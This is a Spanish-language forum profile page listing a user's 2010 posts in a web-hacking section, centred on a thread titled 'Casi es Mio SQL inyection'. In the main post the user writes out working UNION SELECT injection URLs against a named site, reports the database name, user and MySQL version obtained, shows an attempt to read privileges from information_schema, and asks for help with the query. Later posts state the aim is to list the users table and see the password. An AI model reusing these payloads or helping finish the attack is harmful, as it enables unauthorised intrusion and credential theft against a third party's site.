Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - nuevaorden

Páginas 1 2 3

#11

Nivel Web / Re: Casi es Mio SQL inyection

22 Marzo 2010, 23:36 PM

lo siento los newbabys como yo aprendemos de maestros como vosotros, buscando .... gracias

#12

Nivel Web / Re: Casi es Mio SQL inyection

22 Marzo 2010, 23:30 PM

para poder ver el password...

#13

Nivel Web / Re: Casi es Mio SQL inyection

22 Marzo 2010, 23:28 PM

jejejejeje, quiero ver las columnas de la base de datos, en ella hay una de usuarios supongo y no la puedo listar.... gracias

#14

Nivel Web / Casi es Mio SQL inyection

22 Marzo 2010, 23:22 PM

Vale en esta web tengo:

http://www.webvulnerable.net/productos.php?id=-1+union+all+select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--

Ya que hay 36-

La versioón del Mysql es : 4.1.22
La base de Datos: qar139
Usuario " Creo" : qar139@%

El tema es , intento sacar mas info como por ejemplo la lista de privilegios:

http://www.webvulnerable.net/productos.php?id=-1+union+all+select%201,concat(grantee,privilege_type,is_grantable),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+information_schema.user_privileges--

pero me da este error:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php on line 53

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php on line 75

puede ser a la version del Mysql??? si es el caso alguien sabe como hacer la quiery correcta???

Gracias

#15